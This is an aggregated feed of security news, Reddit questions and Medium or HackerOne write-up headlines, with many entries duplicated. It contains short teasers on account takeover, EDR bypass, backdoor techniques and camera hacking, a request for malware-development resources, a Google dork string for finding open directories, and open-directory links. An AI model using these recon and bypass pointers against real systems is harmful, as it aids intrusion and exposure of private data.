    I do what I've come to understand is called "threat hunting", and I know there are agreed upon templates for disclosing vulnerabilities for hackers, but what about after the fact? How do you properly with authority inform website owners that the security (or lack thereof) of their site or app had been breached? What I've done so far is simply to describe the IOCs and add my best guess in terms of entry point. As you might imagine, it's totally ignored 95% of time. submitted by /u/C0ffeeface [link] [comments]
    What should I use for privacy security in home network - firewall + vpn router or ?
    We have very small network ...desktop + chromecast and couple of smart phones all on wifi currently have R6250 router and want to upgrade ...someone suggested firewall plus vpn router but I am not sure what should we do ? if you also suggest physical firewall and vpn router ..please give us model no. of your choice is it possible to get both firewall and vpn router in one device ? also even if we have VPN router - we need third party service like Nordvpn or similar correct? submitted by /u/curiosityv [link] [comments]
    Are there any good reasons an average workstation need to connect to WMI?
    I realize there are some reasons for wmi on servers, but do workstations have any good reason to be able to reach wmi ports? submitted by /u/Outrageous_Dot_1113 [link] [comments]
    free resource or course to prepare for OSCE
    Hi guys i am looking for free resource to learn Exploit Development such as AV Bypass, etc. can anyone help me or give me a proper guide on how to learn it. submitted by /u/geeky_gopher [link] [comments]
    Why would ESTsecurity be malware?
    Today my friend sent me a link to download a program via mega, but before downloading it I checked the file through VirusTotal, in which it checked all the files present as 'safe', except for one: ESTsecurity. In the brief research I did I discovered that it was an antivirus, even indicated by some people. But why would an antivirus be in a program download and why would it be insecure? submitted by /u/3tigrestristes [link] [comments]
  • Open

    The importance of fuzzing and unit tests
    Table Of Content Continue reading on Medium »
  • Open

    The importance of fuzzing and unit tests
    Table Of Content Continue reading on Medium »
  • Open

    Learning Web-Sec - Day 16 - Authentication Vulnerabilities
    2FA simple bypass - PortSwigger Lab Walkthrough Continue reading on System Weakness »
    SSRF That Allowed Us to Access Whole Infra Web Services and Many More
    Hi this is Basavaraj back again with another writeup on SSRF. Continue reading on Medium »
    Unlocking the Power of Observation: How Experienced Hackers Stand Out in a Sea of Amateurs
    Hackers have a superpower “Observation” but it doesn’t come naturally, a hacker gains it with experience and brainstorming but as… Continue reading on System Weakness »
    IDOR Leads to MASS Account Takeover
    In most web applications, there is a high prevalence of misconfiguration problems, particularly with regard to authorization. Continue reading on Medium »
    Introduction Web3 hacking Part1
    Web 1.0 is the term used for the earliest version of the Internet & its all about fetching and reading the data Continue reading on Medium »
    Google Hacking
    Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security… Continue reading on Medium »
    Awesome bro! keep it going, I'd like to collab with you.
    Continue reading on Medium »
  • Open

    Raptor - imaging tool
    I am looking for the most recent version of raptor. For the life of me I can not find a download page. I have read that ownership of the software has switched hands quite a few times. Any help appreciated, thanks. submitted by /u/Novel-Damage2050 [link] [comments]
  • Open

    Help a newbie find his way in malware development
    I'm a computer security enthusiast and aspiring malware developer looking for some guidance and resources. Can anyone point me in the right direction for some free resources to get started with malware development? Bonus points if you can throw in a roadmap for me to follow! Thanks for your help, I'm looking forward to learning from all of you! submitted by /u/AcidOP_69 [link] [comments]
  • Open

    Jenis Pengumpulan Informasi OSINT
    Ada berbagai sumber yang dapat digunakan untuk pengumpulan informasi OSINT, namun tidak terbatas pada media sosial, mesin pencari, dan… Continue reading on Medium »
    Vital Lessons I Learned from OSINT Techniques Book
    Discover the valuable lessons learned from the 10th edition of the OSINT Techniques Continue reading on Medium »
    SPY NEWS: 2023 — Week 6
    Summary of the espionage-related news stories for the Week 6 (February 5–11) of 2023. Continue reading on Medium »
    Hacking surveillance cameras
    Let’s talk about finding IP cameras and gaining access to them… The following description is not a guide to action and should not be used… Continue reading on Medium »
    Air Superiority over Ukraine. Easy to Want, Hard to Obtain.
    As we approach the first anniversary of the 3 day Special Military Operation, we thought we’d take a closer look at some of the more… Continue reading on Medium »
  • Open

    HWSyscalls is a new method to execute indirect syscalls using hardware breakpoints, HalosGate and a synthetic trampoline on kernel32 with hardware breakpoints.
    submitted by /u/Idov31 [link] [comments]
    How curious are you?
    submitted by /u/NemanjaVas [link] [comments]
    CHERIoT: Rethinking security for low-cost embedded systems - Microsoft Research
    submitted by /u/Gallus [link] [comments]
  • Open

    SecWiki News 2023-02-12 Review
    ZKP in Hidden Order Group 未知阶群内的零知识证明 by ourren 某运营商外网打点到内网横向渗透的全过程 by ourren 2022全国微信泄密典型案例 by ourren ChatGPT 对网络安全的影响 by ourren ChatGPT在安全运营中的应用初探 by ourren 程序执行痕迹进行取证的多种方式 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-02-12 Review
    ZKP in Hidden Order Group 未知阶群内的零知识证明 by ourren 某运营商外网打点到内网横向渗透的全过程 by ourren 2022全国微信泄密典型案例 by ourren ChatGPT 对网络安全的影响 by ourren ChatGPT在安全运营中的应用初探 by ourren 程序执行痕迹进行取证的多种方式 by ourren 更多最新文章,请访问SecWiki
  • Open

    Robust Security Network and Extended Authentication Protocol in Detail
    submitted by /u/tbhaxor [link] [comments]
  • Open

    BROKEN FUNCTION LEVEL AUTHORIZATION [API SECURITY — 0x2]
    No content preview
    SQL INJECTIONS
    No content preview
  • Open

    BROKEN FUNCTION LEVEL AUTHORIZATION [API SECURITY — 0x2]
    No content preview
    SQL INJECTIONS
    No content preview
  • Open

    BROKEN FUNCTION LEVEL AUTHORIZATION [API SECURITY — 0x2]
    No content preview
    SQL INJECTIONS
    No content preview
  • Open

    Game Of Active Directory v2 — Winterfell — Parte 1 [Español]
    Para esta primera parte se hara una serie de acciones para identificar posibles brechas de seguridad en el entorno de laboratorio, entre… Continue reading on Medium »
  • Open

    Some NSFW ODs
    https://tokyokinky.com/blog/wp-content/uploads/ https://www.bdsmtw.com/wp-content/uploads/ submitted by /u/False-Celebration930 [link] [comments]
  • Open

    Qakbot 开始利用 OneNote 文件进行分发
    OneNote 文件原本很少被滥用,但最近攻击者开始青睐该类文件。最初只是一些小规模的恶意软件攻击,现在 Qakbot 也加入进来。
    银行木马 Ermac 新演化分支:Hook
    Hook 恶意软件家族已经被研究人员列为高危恶意软件行列,它的出现也将会助推 Ermac 家族的传播更进一步。

  • Open

    Data-backup against ransomware attacks defence
    What knowledge sources can provide information regarding protecting data backups against ransomware attacks as it concerns * state of the art * trends how it apparently is going to change short and middle term ? Addressed are those of organizational as well as technological domain measures delivering highest gain among all those practiced. submitted by /u/Biyeuy [link] [comments]
    Can you rate my security measures and perhaps suggest more
    First of all before I bore you, apologies if this is not the right place. I'm extremely new to this, so if not, could you kindly point me in the right direction? Thanks ​ OK so I've no real real to be paranoid or anything but wanted a project and so I'm trying to live as reasonably secure as possible. With obvious things like not posting things online aside, how vulnerable am I from either attack, or from being traced? Here's the early days system I'm hoping to get tips on: - Decoy main windowd main install to 1 TB ssd in comp. No personal info, never user except to dowload a few isos. - Full encryption linux mint install on USB drive thats regularly removed. This is the thing I'm concerned about securing. Mulvad VPN set up with lockdown mode + kill switch. Then I use virtual machines from within this and regularly delete/create to cut down on just using one. Do these VMS add anything inbetween? ​ I'm a total noob so help, more relevant communities or documentation would all be greatly apprecated. submitted by /u/Middle-Chef5488 [link] [comments]
    How much I can interpret about TCP and UDP?
    Hey guys, I'm studying for CompTIA and some questions are related to TCP and UPC. They make some scenarios like "What if a got a lot of TCP packets in one direction, but empty in the other". I'd like to know how you daily analize this kind of protocols. For example, if you got a lof of TCP packets from a IP you don't trust what would you look? Also, When it's a good option to look UDP packets and analyze them? If you hand some idea of what I'm asking and you can further explain some scenarios, would be very welcome. submitted by /u/MrNoodlesLearns [link] [comments]
    To paranoid about firewall openings towards AWS?
    I work in a rather big company, and we are trying to increase the visibility in our AWS. Our IDS supplier has a module for it, but when the time for implementation came they asked us to open port 443 outbound to *.amazonaws.com from our IDS master in our datacenter. For me, that sounds like a huge risk. The supplier has made a big effort to tell me that this is best practice. So asknetsec, what is your take on this? submitted by /u/patsve123 [link] [comments]
    ELK for Security Engineers
    Hi, Do you know any courses based on the topic "ELK for Security Engineers"? I know one cool cource which I bought https://www.networkdefense.io/library/elk-for-security-analysis-28074/about/ But I took it when there was old ELK and with the new 8.6, a lot has changed. For example, the appearance of the Elastic Agent, in many places the UI has been changed and an unprepared user needs additional efforts to understand where to press the right button. Also, I found this https://georgebridgeman.com/ where this dude explains a lot of things about ELK, but not from security perspective which is not what I'm looking, but it's interesting to listen to better understand ELK. submitted by /u/athanielx [link] [comments]
    Difference between bytes wireshark and nfdump
    Just a general question that i'm stumped on. When opening this conversation on wireshark and nfdump there is a difference between bytes reported. Why is that so? https://imgur.com/a/EdUyXOg submitted by /u/reckless_boar [link] [comments]
    How to become guru in Windows Security?
    Could you recommend any courses that are worth taking to understand more about cybersecurity in Windows? I want to gain the knowledge that will allow me to better organize and develop security in Windows envirement. Because right now, everything is rather chaotic and my knowledge of cybersecurity in Windows is selective. I am not interested in courses where there are a lot of dry information, I am more interested in knowledge where lecturer will share some insights what to do with this information and how to do it. My start point is: https://learn.microsoft.com/en-us/certifications/browse/?roles=security-engineer&resource_type=certification I've taken courses there before, and they seemed pretty basic to me. It's not what I'm looking for. But maybe I'm wrong, because the sample is very small. submitted by /u/athanielx [link] [comments]
  • Open

    allintext Returns Nothing!?
    intext:"Search Term" intitle:"index.of./" (bmp|gif|jpg|png|psd|tif|tiff) -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) Very useful. But sometimes I don't have an EXACT phrase. But for the life of me, I cannot find any way to use allintext in this string and get results. Is there really no alternative to using intext for every single search term individually? submitted by /u/OHOLshoukanjuu [link] [comments]
    Tv show theme songs
    https://www.quizmasters.biz/DB/Audio/Tv%20Themes/Mp3/ http://foto.teoteater.ee/muusika/all-time%20top%20100%20tv%20themes/ ​ ​ submitted by /u/Waste-Release-6235 [link] [comments]
    are these wget downloads always around 100 kbps?
    Well whenever I have to download I use [ wget -r -np -P F:\ ] . is there any other command that can be use or improve the process? UPDATE I changed the command and it kinda sped upto 500 kbps I used [ wget -r -np -t 1 -A jpg,png,jpeg -P F:\ ] helps with .html and txt files not getting downloaded. jpg, png,jpeg are file extensions I wanted to download, you can use any of file extension you like to download from OD i.e. html, txt, gif, mp4, mp3 any you want and there is no space between commas. submitted by /u/False-Celebration930 [link] [comments]
  • Open

    HubSpot Full Account Takeover in Bug Bounty
    Hi everybody, our story today will be about how I was able to get a Full account takeover on HubSpot Public Bug Bounty Program at Bugcrowd… Continue reading on Medium »
    Hacking skills and tools you should have
    1.Tamper Data 2.Hack Bar 3.Live HTTP headers 4.User-Agent Switcher 5.Flagfox 6.Domain Details 7.Cookie Manager+ 8.HttpFox 9.XSS Me… Continue reading on Medium »
    [BUG BOUNTY] SUBDOMAIN TAKEOVER IN TARGET CNAME GHOST.IO
    Um controle de subdomínio ocorre quando um invasor obtém controle sobre um subdomínio de um domínio de destino. Normalmente, isso acontece… Continue reading on Medium »
    Bug Bounty Hunting 101: Falcon Recon.
    Hey Comrades, Continue reading on Medium »
    What is a Bug Bounty Program and how to Get Started by ChatGPT
    I have recently looked into bug bounty programs and decided I would write a blog, however I also wanted to have some fun with this and… Continue reading on Medium »
    Finding your first bug bounty booty!
    Introduction Continue reading on Medium »
    We Hacked GitHub for a Month
    Here’s What We Found Continue reading on Medium »
    Learning Web-Sec - Day 15 - Authentication Vulnerability
    Multi Factor Authentication Continue reading on System Weakness »
    What is bug bounty? And how to start?
    One of the most intriguing aspects of cybersecurity is the possibility for any freelancer to be involved in “bug bounties”. Continue reading on Medium »
    Bug Zero at a Glance [Week 04–10 February]
    What happened with Bug Zero? Continue reading on Bug Zero »
    XSS and SQL injection vulnerability and extraction of all important data
    Hello friends. I hope you are well, I am MR_NETWORK. Continue reading on Medium »
  • Open

    Sector035 | OSINT Quiz Guide
    So this write up for Sector035's challenge is going to be my first attempt at solving an OSINT quiz for the OSINT Dojo’s Student I badge… Continue reading on Medium »
    Wire, as we did it 20 years ago
    Olds will appreciate. Let’s talk today about the use of audio fixation tools during investigations… The following description is not a… Continue reading on Medium »
    Reverse Image Search: How to do it?
    Reverse image search is a technique that allows you to search the internet for similar images based on a sample image. This can be useful… Continue reading on Medium »
    APT Groups Introduction — Part I
    APT stands for Advanced Persistent Threat. It refers to a type of cyber attack carried out by a group of skilled hackers who are typically… Continue reading on System Weakness »
    Update v3 (Malaysian OSINT resource list)
    This update focus on licensed professional search and .my whois record Continue reading on Medium »
  • Open

    what is an IP address ?
    No content preview
    CyberVerse — Introducing a Cyber Security Community
    No content preview
    ChatGPT can boost your Threat Modeling skills
    Use ChatGPT to turbo-charge your cybersecurity processes Continue reading on InfoSec Write-ups »
  • Open

    what is an IP address ?
    No content preview
    CyberVerse — Introducing a Cyber Security Community
    No content preview
    ChatGPT can boost your Threat Modeling skills
    Use ChatGPT to turbo-charge your cybersecurity processes Continue reading on InfoSec Write-ups »
  • Open

    what is an IP address ?
    No content preview
    CyberVerse — Introducing a Cyber Security Community
    No content preview
    ChatGPT can boost your Threat Modeling skills
    Use ChatGPT to turbo-charge your cybersecurity processes Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2023-02-11 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-02-11 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    A tale of a full Business Takeover — Red Team Diaries
    This story is going to be about a Red Team engagement conducted on a big fashion brand that is owned and ran by a small family in India… Continue reading on InfoSec Write-ups »
    A tale of a full Business Takeover — Red Team Diaries
    This story is going to be about a Red Team engagement conducted on a big fashion brand that is owned and ran by a small family in India… Continue reading on Medium »
  • Open

    系统后门技术总结与分析利用(二)
    这篇文章将继续对一些后门技术进行分析利用,希望可以对大家的学习提供一些帮助。
    有趣的Hack-A-Sat黑掉卫星挑战赛——被破坏的阿波罗计算机(解法一)
    本文介绍了Hack-A-Sat黑掉卫星挑战赛的 寻找阿波罗导航计算机中被修改的PI(apollo_gcm)这道赛题的解题过程。
  • Open

    {Series] Offensive Wi-Fi Security
    submitted by /u/tbhaxor [link] [comments]
  • Open

    GitHub - dwisiswant0/gfx: A wrapper around grep, to help you grep for things! - Improved version of gf by @tomnomnom.
    submitted by /u/dwisiswant0 [link] [comments]
    Understanding auditd logs for threat hunting
    submitted by /u/InH4te [link] [comments]
    Active Malware Campaign Targeting Popular Python Packages Underway
    submitted by /u/louis11 [link] [comments]

  • Open

    CHFI
    I am studying for the CHFI exam, does anyone have any pointers and or study tips. submitted by /u/Snoo30695 [link] [comments]
  • Open

    FireFly : an advanced black-box fuzzer and not just a standard asset discovery tool
    submitted by /u/hisxo [link] [comments]
    New vuln in in NTFS3 leads to DoS
    submitted by /u/jat0369 [link] [comments]
    Information disclosure to GDPR breach? A Google tale…
    submitted by /u/lukeberner [link] [comments]
    LocalPotato - When Swapping The Context Leads You To SYSTEM
    submitted by /u/splinter_code [link] [comments]
    #ShortAndMalicious — PikaBot and the Matanbuchus connection
    submitted by /u/OwnPreparation3424 [link] [comments]
    Find Writable Shares with Python.
    submitted by /u/oldboy21 [link] [comments]
    Cracking the Odd Case of Randomness in Java
    submitted by /u/Gallus [link] [comments]
    Found SaltStack on a network and don't know how to attack the thing? Check out how a few configuration issues and a new spin on Jinja template injections can undo a network managed by Salt
    submitted by /u/SkylightCyber [link] [comments]
    secpat2gf: convert secret patterns to gf compatible.
    submitted by /u/dwisiswant0 [link] [comments]
    Avalanche Blockchain Vulnerable to 0day DoS
    submitted by /u/endless [link] [comments]
  • Open

    Is there anyway to download a video that doesn't let you right click save, and the source is not in the element?
    submitted by /u/dudewithoneleg [link] [comments]
    Pokemon Misc
    this directory is what seems to be a plenty of pokemon related archives, doujin (sfw), fan art, illustrations scans from mangas in many languages, posters from the pokemon TCG and even photo of the authors signing stuff. there is a plenty here, I hope you enjoy. submitted by /u/math_001 [link] [comments]
    found a directiry with some doujinshi (not sure but may have NSFW)
    Found it but didn't checked all the zipped files, the one I checked seems to be SFW. http://manga.megchan.com/doujinshi/ submitted by /u/math_001 [link] [comments]
    Management applications for ISPs and providers
    submitted by /u/deadjdona [link] [comments]
  • Open

    Brooklyn Nine Nine TryHackMe Writeup | By Xploit Ayush
    No content preview
    Hydra TryHackMe Writeup | By Xploit Ayush
    No content preview
    STOCKER [HTB-EASY]
    No content preview
    ASSOCIATION RULE MINING
    No content preview
    WHEN CLUSTERING MEETS CYBER-SECURITY:
    No content preview
    How to test Exposed API Keys using Nuclei
    No content preview
    Discovering the Power of ChatGPT: My Experiences and Insights
    No content preview
    How I Was Able to Takeover User Accounts via CSRF on an E-Commerce Website
    No content preview
    Disabling js for the win
    ,or how reading the html code w/ care lead to rce through file upload Continue reading on InfoSec Write-ups »
    XSS vulnerability
    No content preview
  • Open

    Brooklyn Nine Nine TryHackMe Writeup | By Xploit Ayush
    No content preview
    Hydra TryHackMe Writeup | By Xploit Ayush
    No content preview
    STOCKER [HTB-EASY]
    No content preview
    ASSOCIATION RULE MINING
    No content preview
    WHEN CLUSTERING MEETS CYBER-SECURITY:
    No content preview
    How to test Exposed API Keys using Nuclei
    No content preview
    Discovering the Power of ChatGPT: My Experiences and Insights
    No content preview
    How I Was Able to Takeover User Accounts via CSRF on an E-Commerce Website
    No content preview
    Disabling js for the win
    ,or how reading the html code w/ care lead to rce through file upload Continue reading on InfoSec Write-ups »
    XSS vulnerability
    No content preview
  • Open

    Brooklyn Nine Nine TryHackMe Writeup | By Xploit Ayush
    No content preview
    Hydra TryHackMe Writeup | By Xploit Ayush
    No content preview
    STOCKER [HTB-EASY]
    No content preview
    ASSOCIATION RULE MINING
    No content preview
    WHEN CLUSTERING MEETS CYBER-SECURITY:
    No content preview
    How to test Exposed API Keys using Nuclei
    No content preview
    Discovering the Power of ChatGPT: My Experiences and Insights
    No content preview
    How I Was Able to Takeover User Accounts via CSRF on an E-Commerce Website
    No content preview
    Disabling js for the win
    ,or how reading the html code w/ care lead to rce through file upload Continue reading on InfoSec Write-ups »
    XSS vulnerability
    No content preview
  • Open

    Disabling js for the win
    ,or how reading the html code w/ care lead to rce through file upload Continue reading on InfoSec Write-ups »
    Information disclosure or GDPR breach? A Google tale…
    This is a vulnerability I reported back in April, 2022 Continue reading on Medium »
    How to Submit Bug Reports That Get Paid
    At Immunefi, we have a simple catchphrase: excellent bug reports lead to excellent payouts. Continue reading on Immunefi »
    How I got a $2000 bounty with RXSS
    Hi fellow hunters, in this write-up, I will explain how I found a reflected cross-site scripting bug and showed multiple attack scenarios. Continue reading on Medium »
    Bug Bounty — O que é?
    Nos últimos anos várias empresas como a Microsoft, Google e Meta ofereceram recompensas para quem encontrasse vulnerabilidade em seus… Continue reading on Medium »
    Partnership Announcement: Credshields & Capture The Bug Join Forces to Offer Unmatched Security…
    We are thrilled to announce a new partnership between two of the leading companies in the security industry: Credshields and Capture The… Continue reading on Medium »
  • Open

    MS Sentinel - Teams channel notifications when assigning incident to a specific group
    Hi all. I'm trying to set up Teams notifications whenever I assign an incident to a group (distribution group in Azure AD I think). I know that I can set up an automation rule to run a playbook with notification on incident change trigger (owner change). However I didn't find out how to trigger the notifications ONLY when the owner is that particular group. If I set it up like I described, every single owner change would produce a message in the Teams since you cannot filter on particular owners in the automation rule. Am I missing something? The playbook works fine, I just have to figure out how to trigger it only and only with owner being that particular group. I'd be happy with any ideas you might have. Thank you! submitted by /u/FreakySeahorse [link] [comments]
    Is it possible to detect if data is being replicated?
    Just curious (learning) if this can even be detected. Like when you hear about these large hacks. They seem to be replicating (?) Company data to their own servers (like Sony, HBO, Experian, etc). Is this something that can't be detected since the hackers on a VPN on their network or logged in as one of their users? submitted by /u/SmarterTogether [link] [comments]
    Question about malware/virus spread
    If you had a compromised PC, is it possible for the malware to attach itself to executables or bios/firmware so that when you flash your bios it could get infected? Or is that really not possible given the general malware couldn’t possibly know how to exploit your firmware even if it attaches to it? (Adding meaningless data to your files that doesn’t amount to anything even if you flash it) submitted by /u/cloud12348 [link] [comments]
    Is it safe to house files in root folder of website?
    We host our company website on secure third party servers and I (web designer and site security novice) discovered we have a blank website on one of our subdomains, but realized we’re hosting A TON of client deliverables and IP in the root folders that are being accessed by us and our clients through FileZilla. IT seems to be fine with it, but I’ve never heard of this practice in my line of work and have no idea if it’s secure in the context of website management. Are there any recommended alternatives? Many clients have firewalls that block file sharing on Google, so this was apparently the solution. submitted by /u/Aware_Cheesecake_550 [link] [comments]
    Free software to replace Norton 360?
    Norton 360 has quite a bit to offer with its firewall, browser extension and malware database, but their pricing model is out of hand. These days, is there anything free that can offer the same amount of protection? Thank you submitted by /u/MattJaccino [link] [comments]
    VPS Ports aren't being closed by firewall?
    I have a ubuntu server on a linode VM that I use as an endpoint for some of my services. I have ufw in place, and I only have it allow my ssh port, 80/443, and my authelia port. I have portainer running in a docker container, and when I go to the IP and port of the VPS, even though I have that port set to deny, ufw is enabled and even after a reboot, I can still get to it. Is there something I'm doing wrong? The port shows open when I go to a portchecker site, but `ufw status` shows it as dropped and firewall enabled. submitted by /u/BelugaBilliam [link] [comments]
  • Open

    Deserialized web security roundup: KeePass dismisses ‘vulnerability’ report
    Article URL: https://portswigger.net/daily-swig/deserialized-web-security-roundup-keepass-dismisses-vulnerability-report-openssl-gets-patched-and-reddit-admits-phishing-hack Comments URL: https://news.ycombinator.com/item?id=34741895 Points: 1 # Comments: 0
  • Open

    SecWiki News 2023-02-10 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-02-10 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Cracking Passwords using John The Ripper
    John the Ripper is a password-cracking tool that can crack hundreds of hashes, ciphers, and even password-protected files. Continue reading on Medium »
  • Open

    ASAN
    Continue reading on Medium »
    Can sanitizers find the two bugs I wrote in C++? — Fuzzing Weekly CW6
    Can sanitizers find the two bugs I wrote in C++? https://ahelwer.ca/post/2023-02-07-cpp-bugs-sanitized/ Continue reading on Medium »
  • Open

    ASAN
    Continue reading on Medium »
    Can sanitizers find the two bugs I wrote in C++? — Fuzzing Weekly CW6
    Can sanitizers find the two bugs I wrote in C++? https://ahelwer.ca/post/2023-02-07-cpp-bugs-sanitized/ Continue reading on Medium »
  • Open

    HackerOne Undisclosed Report Leak via PoC of Full Disclosure on Hacktivity
    HackerOne disclosed a bug submitted by syjane: https://hackerone.com/reports/1826141 - Bounty: $500
    Double forward slash breaks server-side restrictions & allows access to prohibited services from a partner account
    EXNESS disclosed a bug submitted by ashwarya: https://hackerone.com/reports/1829170 - Bounty: $200
    Desktop client can be tricked into opening/executing local files when clicking a nc://open/ link
    Nextcloud disclosed a bug submitted by lukasreschke: https://hackerone.com/reports/1720043 - Bounty: $750
    Jitsi Desktop Client RCE By Interacting with Malicious URL Schemes on Windows
    8x8 Bounty disclosed a bug submitted by ex0dus-0x: https://hackerone.com/reports/1692603 - Bounty: $777
    SSRF via filter bypass due to lax checking on IPs
    Nextcloud disclosed a bug submitted by obitorasu: https://hackerone.com/reports/1702864 - Bounty: $250
  • Open

    Can sanitizers find the two bugs I wrote in C++? – Fuzzing Weekly CW6
    Article URL: https://fuzzingweekly.medium.com/can-sanitizers-find-the-two-bugs-i-wrote-in-c-fuzzing-weekly-cw6-f85469e0d787 Comments URL: https://news.ycombinator.com/item?id=34738080 Points: 1 # Comments: 0
  • Open

    慢雾:“揭开” 数千万美金大盗团伙 Monkey Drainer 的神秘面纱
    本篇文章仅针对 Monkey Drainer 团伙的部分钓鱼素材及钓鱼钱包地址进行分析。
    FreeBuf 周报 | 再度思考CSMA;ChatGPT 或带来新的网络攻击
    我们总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    钓鱼网站“潜伏”谷歌广告,窃取亚马逊用户账密
    一项针对亚马逊网络服务(AWS)用户登录信息的钓鱼活动将网站隐藏在谷歌搜索中,以窃取用户的登录凭据。
    NIST 宣布 ASCON 为物联网数据保护加密算法
    美国国家标准与技术研究所(NIST)宣布,名为Ascon的认证加密和散列算法系列将成为标准算法,用于轻量级密码学应用。
    SIEMSOC核心需求匹配;K8s的作用到底几何?| FB甲方群话题讨论
    聊聊安全离不开的SIEM/SOC需求,以及如何看待K8s无用论。
    Reddit遭钓鱼攻击,攻击者已获得内部权限
    攻击者使用了一种针对 Reddit 员工的网络钓鱼诱饵,通过冒充其内部网站的登陆页面窃取员工账户凭证。
    API经济蓬勃发展,F5构筑数字安全新防线
    API也是企业数字化业务的基础,在企业数字化转型的浪潮中,它成为黑客和恶意攻击者的首要目标。

  • Open

    What is OSINT?
    OSINT is a process of gathering information from publicly available sources to be used in an intelligence context. In the digital age… Continue reading on Medium »
    O What??? How Open Source Intelligence Connects our World
    OSINT has become a bit of a buzzword, whilst becoming more blurred on whats actually classified as open source intelligence. Today we’ll… Continue reading on Medium »
    The Six Pillars of OSINT Documentation
    If you do any kind of online investigative or research work, then you’re no stranger to the rush of finding hidden information about your… Continue reading on The First Digit »
    The Six Pillars of OSINT Documentation
    If you do any kind of online investigative or research work, then you’re no stranger to the rush of finding hidden information about your… Continue reading on Medium »
    OSINT tools and techniques for conducting online research and data collection
    Open Source Intelligence (OSINT) has become a crucial aspect of modern investigations, providing valuable insights into the digital world… Continue reading on Medium »
  • Open

    Certified Red Team Professional (CRTP) discontinued
    Hello, I recently passed OSCP (go me, right?) and was disappointed to learn that the CRTP materials were no longer offered by Pentester Academy. This was the next item on my to-do list that is no longer an option. Does anyone have any information as to why it has been shut down? In addition, because it has been shut down, would anyone be willing to share the materials or their notes with me? I want to read the materials to learn and grow my skillset. Thank you. submitted by /u/tommyleeonetwothree [link] [comments]
    Palo Alto Networks Cortex XDR Bypass (Updated for 2023)
    In this week's red team tip, I show how to bypass Palo Alto Networks Cortex XDR. Much of this was inspired by what mrd0x released last year. Some major changes in XDR have made many methods not opsec safe. They also added obfuscation to some of the values. https://youtu.be/f1z7wTnD4Z8 submitted by /u/Infosecsamurai [link] [comments]
    Neo4jection: Secrets, Data, and Cloud Exploits - Attacking Neo4j
    submitted by /u/lowlandsmarch [link] [comments]
  • Open

    Allow smtp server for users in a private network
    Do you have an authenticated smtp server (port 587 or 465) accessible for everybody on your corporate network? Here we have one for servers use only, but some users are asking to be able to use it in mail clients like outlook or thunderbird. Do you see any problems allowing that? Edit: it's a large corporate network. submitted by /u/PianoConcertoNo1 [link] [comments]
    Does Cloud Linux VMs require EDR, XDR?
    We are trying to implement an EDR or XDR solution with Microsoft 365 Defender or Crowdstrike Falcon Go. I never thought about the cloud environment though. Is it a security practice to deploy agents for Cloud EC2 instances (AWS in our case) Linux OS? submitted by /u/chalreshammer12 [link] [comments]
    Junior Pen Tester - CTF interview
    Hi everybody. I am in the process of interviewing with a Big 4 company for a junior pen tester position. They asked me to have a technical interview in the form of CTF for 3 hours long (Windows Machine). Any recommendations on what to practice and where? Any recommended boxes on Tryhackme or HTB? PS: I am eJPT certified, and I know some stuff in general. I practice in THM a lot, but still I believe that I am just in the beginning. Thank you in advance submitted by /u/apostonikos [link] [comments]
    Junior Pen Tester in UK
    Hi guys, I am based in Jersey, UK. Just passed Sec+, looking to start CREST CPSA then CRT. I have looked online for jobs, but there is not a lot out there for Junior Pen Tester and all the companies ask for experience. Any tips how to land a job after passing CPSA then CRT with no experience. FYI I am on £45K per annum. Thanks in advance submitted by /u/CyberHero86 [link] [comments]
    I'm studying cyber resiliency and you can help!
    Hello fellow cybersecurity professionals! I'm a PhD candidate in the U.S. studying cybersecurity leadership, and my chosen topic of interest is cyber resiliency -- the ability for a system to withstand negative effects and continue operating critical functions. In short (and in military terms), to take a hit and keep fighting. You can help with this important research! I am seeking participants for my online survey to better understand the innovation-decision process for cyber resiliency, and what influences affect adoption or rejection of cyber resiliency innovations at the organizational leadership level. Participants should be mid-senior level cybersecurity professionals with more than 5 years of field experience. The survey should take no longer than 15 minutes to complete (tested by pilot); you will remain anonymous. There's an option for a live interview at the end, please consider it as it will help enrich the data collected! Link to the survey is here: https://www.surveymonkey.com/r/cyberstudy submitted by /u/hunter281 [link] [comments]
    Do you use in your daily task any script or something related to Powershell?
    I'm a Mac and Linux user, so almost all the command lines and scripts are based on Unix. I'm learning the basic about Powershell, i'm trying to understand if I can involve on my daily task this shell. For example, I just know it have some homologous commands from Prompt. Something I've used so many time ago and isn't my strong, because like I've said I migrated like 10 or more years to Mac and Linux. Now for general study and research, I'm trying to understand if Powershell it's involved in something important or useful in NetSec. If you have some daily commands or maybe some scripts in Github you use daily or somethings because this shell bring you more efficient, please share with me. Thx! submitted by /u/MrNoodlesLearns [link] [comments]
  • Open

    We had a security incident. Here’s what we know.
    submitted by /u/sanitybit [link] [comments]
    Exploit Vector Analysis of Emerging 'ESXiArgs' Ransomware
    submitted by /u/DrinkMoreCodeMore [link] [comments]
    Neo4jection: Secrets, Data, and Cloud Exploits - Attacking Neo4j
    submitted by /u/lowlandsmarch [link] [comments]
    Offphish - Phishing revisited in 2023
    submitted by /u/0xcsandker [link] [comments]
  • Open

    Making $500 by flipping a 0 to 1
    I recently found my first vulnerability in the wild. The vulnerability was a P1 and all I had to do was turn a 0 into a 1. Continue reading on InfoSec Write-ups »
    Bug Bounty Hunting 101, Js files Diving.
    Hello fellas, Continue reading on Medium »
    OSI Model Networking Fundamentals -Tryhackme.com Day 2
    Introductory Networking(OSI,Tools) Continue reading on Medium »
    SameSite Lax Bypass through Method Override | 2023
    Portswigger’s CSRF lab Simple Solution | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    8 Top tips to help you find SQLi
    Introduction Continue reading on Medium »
    Broken Access Control: Understanding and Finding Issues
    Broken access control can result in data breaches and security incidents. Find issues by performing threat modeling, security assessments… Continue reading on Medium »
    Pwning.eth Earns Third Whitehat Hall of Fame NFT
    Pwning.eth has earned a third Whitehat Hall of Fame NFT for his critical bug find in Moonbeam, Astar, and Acala on June 27, 2022. He… Continue reading on Immunefi »
    How to Get Into Bug Bounties?(
